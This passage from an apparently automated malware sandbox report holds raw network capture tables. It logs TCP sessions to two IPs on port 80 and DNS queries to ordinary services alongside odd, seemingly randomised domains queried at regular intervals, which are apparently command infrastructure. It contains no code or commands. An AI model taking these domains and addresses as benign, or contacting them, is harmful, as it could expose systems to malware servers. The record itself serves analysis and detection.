                                                                                                                                                                            Dec 11, 2024 09:42:38.414628983 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:38.414655924 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:38.414738894 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:38.723031998 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.730407953 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.849764109 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.849849939 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.865075111 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:39.984472036 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.071592093 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.071659088 CET805012067.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.071805954 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:41.368546963 CET5012080192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.381757021 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.501130104 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:42.503256083 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.517679930 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:42.637101889 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:42.637114048 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:43.792836905 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:43.792902946 CET805012267.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:43.792953014 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:44.020028114 CET5012280192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.039130926 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.158528090 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:45.159287930 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.171138048 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:45.290469885 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:46.377219915 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:46.377271891 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:46.383856058 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:46.383856058 CET5012380192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:46.503154039 CET805012367.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:52.457398891 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:52.576858997 CET805012485.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:52.577030897 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:52.593290091 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:52.713488102 CET805012485.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:54.097806931 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:54.217776060 CET805012485.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:54.217987061 CET5012480192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.101396084 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.221533060 CET805012585.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:55.223320007 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.239033937 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:55.358505011 CET805012585.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:56.753294945 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:56.873224020 CET805012585.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:56.873483896 CET5012580192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:57.758574009 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:57.878014088 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:57.878108978 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:57.893518925 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:58.013247967 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:58.013262987 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:59.395418882 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:42:59.515425920 CET805012685.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:59.515475988 CET5012680192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.413573980 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.533065081 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:00.535290003 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.543303967 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:00.662697077 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:01.878988981 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:01.879012108 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:43:01.879151106 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:01.881756067 CET5012780192.168.2.585.159.66.93
                                                                                                                                                                            Dec 11, 2024 09:43:02.003077030 CET805012785.159.66.93192.168.2.5
                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Dec 11, 2024 09:39:39.094712973 CET5910053192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:39.925025940 CET53591001.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:40.085216999 CET5910053192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:40.222278118 CET53591001.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:41.658925056 CET6386353192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:44.717425108 CET5152653192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:44.717586994 CET5278653192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:44.854379892 CET53515261.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:44.854664087 CET53527861.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.337718010 CET6195953192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.338360071 CET5423853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.338728905 CET6076053192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.339008093 CET4997753192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.358917952 CET4954153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.359244108 CET4964953192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.467603922 CET5538353192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.474896908 CET53542381.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.475100994 CET53607601.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.475111961 CET53619591.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.475881100 CET53499771.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.495547056 CET53495411.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.496345997 CET53496491.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.591061115 CET5665953192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.604835033 CET53553831.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:46.620287895 CET4925853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:46.905910969 CET5758853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:49.205513000 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:49.518929958 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.139683008 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.291327000 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.291347027 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.291359901 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.291388035 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.295555115 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.296103001 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.299418926 CET4918153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:50.301901102 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.439261913 CET53491811.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.453948021 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.500873089 CET5233853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:50.526102066 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.610733032 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.610827923 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.610841990 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.610852957 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.611495972 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.611561060 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.616290092 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.836810112 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:50.925106049 CET44353955172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:50.962405920 CET53955443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.562330961 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.611680031 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.611773014 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.611787081 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.611890078 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.615184069 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.617228985 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.617758989 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.618175030 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.876844883 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931206942 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931408882 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931420088 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931428909 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.931453943 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:51.985244036 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:51.985333920 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:52.298731089 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:52.333853006 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:39:59.734719992 CET6411153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:39:59.872400999 CET53641111.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:07.385991096 CET5857753192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:07.859210968 CET53585771.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:08.989829063 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:08.989975929 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:09.304446936 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.305927038 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.307070017 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:09.307408094 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:11.361370087 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:11.363116980 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:11.675440073 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.676178932 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.676939964 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.678014040 CET44362885172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:11.807231903 CET62885443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:22.069008112 CET5615253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:22.379512072 CET53561521.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:30.444436073 CET5211153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:30.949043036 CET53521111.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:45.980247021 CET5352353192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:40:46.453191996 CET53535231.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.604561090 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:53.606281042 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:53.606457949 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:53.606587887 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.628922939 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.629024982 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.629997015 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.630245924 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.690325975 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.690855026 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.691806078 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.722438097 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.946002960 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946029902 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946063995 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946073055 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946177959 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946208954 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.946563959 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.946701050 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.946701050 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:54.956757069 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:55.005657911 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.034918070 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:40:55.260469913 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.260493040 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.272542000 CET44364872172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.300374985 CET64872443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:41:00.886765957 CET6173253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:01.441981077 CET53617321.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:16.148329020 CET6099653192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:16.863744020 CET53609961.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:31.101196051 CET5361353192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:31.627553940 CET53536131.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:45.836941957 CET6171953192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:41:46.325268030 CET53617191.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:00.527029037 CET5114153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:01.474280119 CET53511411.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:36.515873909 CET6154853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:36.685125113 CET5901153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:36.822680950 CET53590111.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:37.068069935 CET53615481.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.587749004 CET5115853192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:39.588105917 CET6416153192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:39.724489927 CET53511581.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.725071907 CET53641611.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:39.726303101 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:39.726597071 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:39.726963997 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:39.727137089 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663003922 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663258076 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663700104 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.663700104 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.810259104 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.822386980 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.822386980 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.864765882 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.977513075 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977530003 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977539062 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977547884 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977557898 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.977612972 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:40.978101015 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.978180885 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.978245020 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:40.988754034 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:41.136348009 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.176264048 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:41.292098045 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.302520037 CET44359852172.64.41.3192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:41.332830906 CET59852443192.168.2.5172.64.41.3
                                                                                                                                                                            Dec 11, 2024 09:42:51.396008968 CET6403253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:52.410677910 CET6403253192.168.2.51.1.1.1
                                                                                                                                                                            Dec 11, 2024 09:42:52.453597069 CET53640321.1.1.1192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:52.547450066 CET53640321.1.1.1192.168.2.5
                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                            Dec 11, 2024 09:42:52.549304008 CET192.168.2.51.1.1.1c23b(Port unreachable)Destination Unreachable
                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                            Dec 11, 2024 09:39:39.094712973 CET192.168.2.51.1.1.10x3633Standard query (0)www.sidqwdf.funA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:40.085216999 CET192.168.2.51.1.1.10x3633Standard query (0)www.sidqwdf.funA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:41.658925056 CET192.168.2.51.1.1.10x4e4eStandard query (0)www.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.717425108 CET192.168.2.51.1.1.10xb3d5Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:44.717586994 CET192.168.2.51.1.1.10x1f33Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.337718010 CET192.168.2.51.1.1.10x3e50Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.338360071 CET192.168.2.51.1.1.10x44daStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.338728905 CET192.168.2.51.1.1.10x170eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.339008093 CET192.168.2.51.1.1.10x5ee7Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.358917952 CET192.168.2.51.1.1.10xb3c6Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.359244108 CET192.168.2.51.1.1.10xe0d1Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.467603922 CET192.168.2.51.1.1.10x21feStandard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.591061115 CET192.168.2.51.1.1.10x6024Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.620287895 CET192.168.2.51.1.1.10x6769Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:46.905910969 CET192.168.2.51.1.1.10xeb22Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.299418926 CET192.168.2.51.1.1.10xa0c4Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:50.500873089 CET192.168.2.51.1.1.10xd69fStandard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:39:59.734719992 CET192.168.2.51.1.1.10x3adStandard query (0)acdn.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:07.385991096 CET192.168.2.51.1.1.10x3505Standard query (0)www.swenansiansie.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:22.069008112 CET192.168.2.51.1.1.10xbcf0Standard query (0)www.mp3cevir.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:30.444436073 CET192.168.2.51.1.1.10x60b1Standard query (0)www.spectre.centerA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:40:45.980247021 CET192.168.2.51.1.1.10xb511Standard query (0)www.synd.funA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:00.886765957 CET192.168.2.51.1.1.10x11fcStandard query (0)www.jagdud.storeA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:16.148329020 CET192.168.2.51.1.1.10x39d0Standard query (0)www.wiretap.digitalA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:31.101196051 CET192.168.2.51.1.1.10x2617Standard query (0)www.it2sp8.vipA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:41:45.836941957 CET192.168.2.51.1.1.10x62bStandard query (0)www.cbprecise.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:00.527029037 CET192.168.2.51.1.1.10xe175Standard query (0)www.yun08ps.topA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:36.515873909 CET192.168.2.51.1.1.10xfe35Standard query (0)www.rtpsilva4d.clickA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:36.685125113 CET192.168.2.51.1.1.10x32d0Standard query (0)www.yun08ps.topA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.587749004 CET192.168.2.51.1.1.10x9d81Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:39.588105917 CET192.168.2.51.1.1.10xa5c2Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:51.396008968 CET192.168.2.51.1.1.10xb60dStandard query (0)www.restobarbebek.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            Dec 11, 2024 09:42:52.410677910 CET192.168.2.51.1.1.10xb60dStandard query (0)www.restobarbebek.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
